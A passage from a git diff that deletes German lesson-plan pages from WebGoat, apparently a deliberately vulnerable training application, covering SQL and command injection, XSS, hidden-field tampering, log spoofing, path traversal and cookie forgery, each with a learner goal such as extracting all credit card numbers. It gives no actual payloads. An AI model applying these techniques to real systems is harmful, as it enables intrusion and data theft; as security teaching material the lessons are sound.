, Grundsätzliche(s) Ziel(e):
-Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
-
diff --git a/src/main/webapp/lesson_plans/German/CommandInjection.html b/src/main/webapp/lesson_plans/German/CommandInjection.html
deleted file mode 100644
index a8de365cb..000000000
--- a/src/main/webapp/lesson_plans/German/CommandInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Einschleusen von Programmcode
-
-Konzept:
-
-Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe
-sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-Grundsätzliche(s) Ziel(e):
-
-Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
deleted file mode 100644
index c4606ac75..000000000
--- a/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lehrplan: Versteckte Felder ausnutzen
-
-Konzept:
-
-Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere
-Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte
-diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder
-zu seinem Vorteil manipulieren kann.
-
-
-
-Grundsätzliche(s) Ziel(e):
-Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/src/main/webapp/lesson_plans/German/HtmlClues.html b/src/main/webapp/lesson_plans/German/HtmlClues.html
deleted file mode 100644
index 70d63e5ee..000000000
--- a/src/main/webapp/lesson_plans/German/HtmlClues.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lehrplan: Nützliche Hinweise in HTML entdecken.
-
-
-Konzept:
-
- Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode.
- Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht.
-
-
-
-Grundsätzliche(s) Ziel(e):
-Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/HttpBasics.html b/src/main/webapp/lesson_plans/German/HttpBasics.html
deleted file mode 100644
index 995912eeb..000000000
--- a/src/main/webapp/lesson_plans/German/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
-Lehrinhalt:
- Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
-
-
-So funktioniert HTTP:
-
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper.
-Der Client initiiert eine Transaktion wie folgt:
-
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
-
-
-GET /index.html?param=value HTTP/1.0
- Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.
-
-User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-
-Grundsätzliche(s) Ziel(e):
-
-Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar!
-
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Knöpfe für Hinweise (Hints), für das Anzeigen von Parametern(Parameters) oder Cookies und für das Anzeigen von Java-Quellcode ausprobiert werden.
-Außerdem, können Sie hier WebScarab gut ausprobieren.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/JavaScriptValidation.html b/src/main/webapp/lesson_plans/German/JavaScriptValidation.html
deleted file mode 100644
index f278bc9d9..000000000
--- a/src/main/webapp/lesson_plans/German/JavaScriptValidation.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lehrplan: Client-seitige JavaScript Validierung umgehen
-
-Konzept:
-
-Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden.
-Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in
-einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede
-Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter
-in der Applikation benutzt werden.
-
-
-Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig
-überprüft. Versuchen Sie diese
-Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln
-gleichzeitig brechen!
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/LogSpoofing.html b/src/main/webapp/lesson_plans/German/LogSpoofing.html
deleted file mode 100644
index c5bbff3b0..000000000
--- a/src/main/webapp/lesson_plans/German/LogSpoofing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)
-
-
-Konzept:
-
-Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen
-bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen
-Handlungen verleiten bzw. ihn einfach nur verwirren.
-
-
-Grundsätzliche(s) Ziel(e):
-
-* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
-* Ihr Ziel ist es so aussehen zu lassen, als hätte sich der Benutzer "admin" erfolgreich eingeloggt.
-* Verbessern Sie Ihren Angriff, indem Sie ein Skript (Javascript) in das Log schreiben.
-
diff --git a/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html
deleted file mode 100644
index c7afce017..000000000
--- a/src/main/webapp/lesson_plans/German/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas
-
-Konzept:
-
-In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem
-er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen
-der Zugang bei direkter Anfrage ansonsten abgelehnt würde.
-
-Grundsätzliche(s) Ziel(e):
-Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/src/main/webapp/lesson_plans/German/ReflectedXSS.html b/src/main/webapp/lesson_plans/German/ReflectedXSS.html
deleted file mode 100644
index 60f5e0e80..000000000
--- a/src/main/webapp/lesson_plans/German/ReflectedXSS.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lehrplan: Cross Site Scripting (XSS)
-
-Konzept:
-
-Jegliche Eingabedaten sollten auf der Serverseite überprüft werden.
-XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden.
-Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese
-URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die
-URL zu besuchen.
-
-
-
-General Goal(s):
-
-Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können.
-Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren)
-so dass das Skript in Ihrem Browser ausgeführt wird.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
deleted file mode 100644
index dbaaeb3c3..000000000
--- a/src/main/webapp/lesson_plans/German/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Zugang zu Web-Resourcen erzwingen
-
-Konzept::
-Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die
-für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle.
-
-Grundsätzliche(s) Ziel(e):
-
-Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle
-von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht
-für das Bestehen dieser Lektion.
-Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie
-die Lektion abgeschlossen haben.
-
-
diff --git a/src/main/webapp/lesson_plans/German/SqlNumericInjection.html b/src/main/webapp/lesson_plans/German/SqlNumericInjection.html
deleted file mode 100644
index ad9e7cc41..000000000
--- a/src/main/webapp/lesson_plans/German/SqlNumericInjection.html
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
Lehrplan: Durchführung von Numeric SQL Injection
-
-
-Konzept:
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der
-als Resultat alle Wetterdaten anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/SqlStringInjection.html b/src/main/webapp/lesson_plans/German/SqlStringInjection.html
deleted file mode 100644
index 0cd360db7..000000000
--- a/src/main/webapp/lesson_plans/German/SqlStringInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lehrplan: Durchführung von String SQL Injection
-
-
-Konzept:
-
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie
-exemplarisch mit dem Benutzernamen "Smith" ausprobieren.
-Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/StoredXss.html b/src/main/webapp/lesson_plans/German/StoredXss.html
deleted file mode 100644
index 74463c949..000000000
--- a/src/main/webapp/lesson_plans/German/StoredXss.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)
-
-Konzept:
-
-Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte
-und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert
-wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte
-Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird.
-
-
-Grundsätzliche(s) Ziel(e):
-
-Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte
-Seite bzw. Inhalt anzuzeigen.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
deleted file mode 100644
index 5475df32c..000000000
--- a/src/main/webapp/lesson_plans/German/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Lehrplan: Einen Authentisierungs Cookie fa¨lschen
-
-
-Lehrinhalt:
-
-Viele Webapplikationen erlauben es einem Benutzer sofort eingeloggt zu sein, sobald der Benutzer den richtigen Authentisierungs Cookie übergibt.
-Manchmal kann der richtige Wert dieses Cookies geraten werden, wenn der Algorithmus zur Generierung dieser Cookies bekannt ist.
-Der Cookie kann auch von dem Computer des Benutzers gestohlen werden indem andere Schwachstellen in seinem System ausgenutzt werden.
-Mittels Cross Site Scripting (XSS) kann der Cookie auch abgefangen werden.
-Diese Übung soll Sie auf das Thema der Authentisierungs Cookies aufmerksam machen und gibt Ihnen
-die Möglichkeit die Authentisierungsmethode dieser Lektion zu überwinden.
-
-
-
-Grundsätzliche(s) Ziel(e):
-
- Es ist Ihre Aufgabe die Authentisierung zu umgehen. Melden Sie sich mit dem Benutzernamen "webgoat" und dem Passwort "webgoat" an
- und schauen Sie was passiert. Sie können auch versuchen Sich mit aspect/aspect anzumelden. Wenn Sie den Authentisierungs Cookie verstehen,
- versuchen Sie Ihre Identität zu "alice" zu wechseln.
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/BasicAuthentication.html b/src/main/webapp/lesson_plans/de/BasicAuthentication.html
deleted file mode 100644
index 65490ef0c..000000000
--- a/src/main/webapp/lesson_plans/de/BasicAuthentication.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Lehrplan: Basic Authentication
-
-Lehrinhalt:
-
-"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage.
-Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource.
-Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver.
-Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind.
-Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer
-sie ein weiteres Mal eingeben muss.
-
-Grundsätzliche(s) Ziel(e):
-Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
-
diff --git a/src/main/webapp/lesson_plans/de/CommandInjection.html b/src/main/webapp/lesson_plans/de/CommandInjection.html
deleted file mode 100644
index a8de365cb..000000000
--- a/src/main/webapp/lesson_plans/de/CommandInjection.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Einschleusen von Programmcode
-
-Konzept:
-
-Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe
-sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-Grundsätzliche(s) Ziel(e):
-
-Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html b/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
deleted file mode 100644
index c4606ac75..000000000
--- a/src/main/webapp/lesson_plans/de/HiddenFieldTampering.html
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
Lehrplan: Versteckte Felder ausnutzen
-
-Konzept:
-
-Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere
-Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte
-diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder
-zu seinem Vorteil manipulieren kann.
-
-
-
-Grundsätzliche(s) Ziel(e):
-Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/src/main/webapp/lesson_plans/de/HtmlClues.html b/src/main/webapp/lesson_plans/de/HtmlClues.html
deleted file mode 100644
index 70d63e5ee..000000000
--- a/src/main/webapp/lesson_plans/de/HtmlClues.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Lehrplan: Nützliche Hinweise in HTML entdecken.
-
-
-Konzept:
-
- Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode.
- Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht.
-
-
-
-Grundsätzliche(s) Ziel(e):
-Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/HttpBasics.html b/src/main/webapp/lesson_plans/de/HttpBasics.html
deleted file mode 100644
index 995912eeb..000000000
--- a/src/main/webapp/lesson_plans/de/HttpBasics.html
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
-Lehrinhalt:
- Diese Lektion stellt die Verständnis-Grundlagen für den Datentransport zwischen Browser und Webapplikation dar.
-
-
-So funktioniert HTTP:
-
-Alle HTTP Transaktionen folgen demselben Schema. Jede Anfrage vom Client und jede Antwort des Servers besteht aus drei Teilen: Der Anfrage-/Antwortzeile, dem Kopf und dem Körper.
-Der Client initiiert eine Transaktion wie folgt:
-
- Der Client kontaktiert den Server und sendet eine Dokumentenanfrage
-
-
-GET /index.html?param=value HTTP/1.0
- Als nächstes sendet der Client optionale Kopfzeilen (Header) um den Server über die Client-seitige Konfiguration und die akzeptierten Dokumentenformate zu informieren.
-
-User-Agent: Mozilla/4.06 Accept: image/gif,image/jpeg, */*
-Nachdem der eigentliche Anfrage (Request) und den weiteren Kopfzeilen (Header) kann der Client noch weitere Daten senden. Diese Daten werden meistens von CGI Programmen im Zusammenhang mit der POST Methode ausgewertet.
-
-Grundsätzliche(s) Ziel(e):
-
-Geben Sie Ihren Namen in das Eingabefeld ein und drücken sie "Los gehts!" um die Anfrage abzuschicken. Der Server wird die Anfrage akzeptieren, Ihre Eingabedaten umdrehen, und wieder zu Ihnen zurückschicken. Dies stellt eine vollständige HTTP Transaktion dar!
-
-Sie sollten mit der Benutzung von WebGoat vertraut werden. Es sollten die Knöpfe für Hinweise (Hints), für das Anzeigen von Parametern(Parameters) oder Cookies und für das Anzeigen von Java-Quellcode ausprobiert werden.
-Außerdem, können Sie hier WebScarab gut ausprobieren.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/JavaScriptValidation.html b/src/main/webapp/lesson_plans/de/JavaScriptValidation.html
deleted file mode 100644
index f278bc9d9..000000000
--- a/src/main/webapp/lesson_plans/de/JavaScriptValidation.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lehrplan: Client-seitige JavaScript Validierung umgehen
-
-Konzept:
-
-Client-seitige Validierung sollte nicht als eine sichere Maßnahme zur Validierung von Parametern angesehen werden.
-Diese Art der Validierung kann höchstens den Server entlasten und verhindern das normale Benutzer Eingabedaten in
-einem falschen Format absenden. Angreifer hingegen, können diesen Mechanismus auf verschiedene Arten umgehen. Jede
-Client-seitige Validierung sollte auf der Serverseite wiederholt werden. Dies verhindert, dass unsichere Parameter
-in der Applikation benutzt werden.
-
-
-Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular verlangt von Ihnen verschiedene Regeln beim Ausfüllen einzuhalten. Dies wird Client-seitig
-überprüft. Versuchen Sie diese
-Regeln zu brechen und senden Sie Daten an die Webseite die die Webseite nicht erwartet! Sie müssen alle 7 Regeln
-gleichzeitig brechen!
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/LogSpoofing.html b/src/main/webapp/lesson_plans/de/LogSpoofing.html
deleted file mode 100644
index c5bbff3b0..000000000
--- a/src/main/webapp/lesson_plans/de/LogSpoofing.html
+++ /dev/null
@@ -1,17 +0,0 @@
-
-
Lehrplan: Fälschen von Einträgen in Log Dateien (Log Spoofing)
-
-
-Konzept:
-
-Log-Einträge in Log-Dateien müssen nicht immer von tatsächlichen Ereignissen stammen. Ein Angreifer kann durch Einschleusen
-bestimmter Einträge das Eintreten bestimmter Ereignisse vortäuschen und dadurch den Administrator zu unnötigen bzw. voreiligen
-Handlungen verleiten bzw. ihn einfach nur verwirren.
-
-
-Grundsätzliche(s) Ziel(e):
-
-* Der graue Bereich steht für das was tatsächlich in der Log-Datei des Webservers erscheint.
-* Ihr Ziel ist es so aussehen zu lassen, als hätte sich der Benutzer "admin" erfolgreich eingeloggt.
-* Verbessern Sie Ihren Angriff, indem Sie ein Skript (Javascript) in das Log schreiben.
-
diff --git a/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html b/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html
deleted file mode 100644
index c7afce017..000000000
--- a/src/main/webapp/lesson_plans/de/PathBasedAccessControl.html
+++ /dev/null
@@ -1,11 +0,0 @@
-
-
Lehrplan: Umgehen eines Pfad-basierten Zugangskontrollschemas
-
-Konzept:
-
-In einem Pfad-basierten Zugangangskontrollschemas (path based access control scheme), kann ein Angreifer den Pfad "bewandern" indem
-er relative Pfadangaben übergibt. Dadurch kann der Angreifer auf Dateien zugreifen, die für niemanden zugänglich sind, bzw. zu denen
-der Zugang bei direkter Anfrage ansonsten abgelehnt würde.
-
-Grundsätzliche(s) Ziel(e):
-Sie sollten in der Lage sein auf eine Datei zuzugreifen die sich nicht im aufgelisteten Verzeichnis befindet.
diff --git a/src/main/webapp/lesson_plans/de/ReflectedXSS.html b/src/main/webapp/lesson_plans/de/ReflectedXSS.html
deleted file mode 100644
index 60f5e0e80..000000000
--- a/src/main/webapp/lesson_plans/de/ReflectedXSS.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Lehrplan: Cross Site Scripting (XSS)
-
-Konzept:
-
-Jegliche Eingabedaten sollten auf der Serverseite überprüft werden.
-XSS passiert wenn nicht geprüfte Benutereingaben in eine HTTP Response eingebaut werden.
-Bei einem reflektierten XSS Angriff, kann ein Angreifer eine URL erzeugen die ein Angriffsskript enthält und kann diese
-URL auf einer Webseite hinterlegen, sie per Email verschicken oder ein Opfer auf eine andere Weise dazu bringen die
-URL zu besuchen.
-
-
-
-General Goal(s):
-
-Ihre Aufgabe ist es, sich ein Stück Javascript zu überlegen das Sie in diese Seite einbauen können.
-Dann versuchen Sie die Seite dazu zu bringen, Ihnen dieses Skript wieder auszulieferen (es zu reflektieren)
-so dass das Skript in Ihrem Browser ausgeführt wird.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html b/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
deleted file mode 100644
index dbaaeb3c3..000000000
--- a/src/main/webapp/lesson_plans/de/RemoteAdminFlaw.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Zugang zu Web-Resourcen erzwingen
-
-Konzept::
-Applikationen haben oftmals eine Administrationsschnittstelle, das priviligierten Benutzern Zugang zu Funktionalität ermöglicht die
-für normale Benutzer nicht sichtbar ist. Der Applikationsserver selbst hat auch oft noch eine seperate Administrationsschnittstelle.
-
-Grundsätzliche(s) Ziel(e):
-
-Versuchen Sie auf die Administrationsschnittstelle von WebGoat zuzugreifen. Sie können auch versuchen auf die Administrationsschnittstelle
-von Tomcat (der Applikationsserver) zuzugreifen. Die Tomcat Schnittstelle kann über die URL /admin erreicht werden, zählt aber nicht
-für das Bestehen dieser Lektion.
-Wenn Sie Zugriff auf Funktionalität der Administrationsschnittstelle erlangt haben, dann kommen Sie hierher zurück um zu sehen ob Sie
-die Lektion abgeschlossen haben.
-
-
diff --git a/src/main/webapp/lesson_plans/de/SqlNumericInjection.html b/src/main/webapp/lesson_plans/de/SqlNumericInjection.html
deleted file mode 100644
index ad9e7cc41..000000000
--- a/src/main/webapp/lesson_plans/de/SqlNumericInjection.html
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
Lehrplan: Durchführung von Numeric SQL Injection
-
-
-Konzept:
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular ermöglicht es dem Benutzer Wetterdaten zu betrachten. Versuchen Sie einen SQL String einzuschleusen, der
-als Resultat alle Wetterdaten anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/SqlStringInjection.html b/src/main/webapp/lesson_plans/de/SqlStringInjection.html
deleted file mode 100644
index 0cd360db7..000000000
--- a/src/main/webapp/lesson_plans/de/SqlStringInjection.html
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
Lehrplan: Durchführung von String SQL Injection
-
-
-Konzept:
-
-SQL Injection Angriffe stellen eine ernstzunehmende Bedrohung für alle Datenbank-getriebenen Webseiten dar.
-Entsprechende Angriffe sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der
-Kompromittierung des kompletten Systems.
-Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
-Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
-leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
-besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
-Skripten und Datenbankabfragen eingebaut werden.
-Grundsätzliche(s) Ziel(e):
-
-Das untenstehende Formular erlaubt es Benutzern ihre Kreditkartennummern anzuzeigen. Das können Sie
-exemplarisch mit dem Benutzernamen "Smith" ausprobieren.
-Versuchen Sie einen SQL String einzuschleusen, der als Resultat alle Kreditkartennummern anzeigt.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/StoredXss.html b/src/main/webapp/lesson_plans/de/StoredXss.html
deleted file mode 100644
index 74463c949..000000000
--- a/src/main/webapp/lesson_plans/de/StoredXss.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lehrplan: Durchführen von Stored Cross Site Scripting (XSS)
-
-Konzept:
-
-Man sollte Eingabedaten immer säubern, besonders diese die später als parameter für Betriebssystembefehle, Skripte
-und Datenbankabfragen benutzt werden. Essentiell ist das für Inhalt der irgendwo in der Applikation permanent gespeichert
-wird. Benutzer sollten nicht in der Lage sein eigene Inhalte zu hinterlassen, durch die andere Nutzer ungewünschte
-Seiten oder Inhalte nachladen wenn der Inhalt betrachtet wird.
-
-
-Grundsätzliche(s) Ziel(e):
-
-Hinterlassen Sie Inhalt der den Browser eines anderen Benutzers dazu bringt eine unerwünschte
-Seite bzw. Inhalt anzuzeigen.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
deleted file mode 100644
index 5475df32c..000000000
--- a/src/main/webapp/lesson_plans/de/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
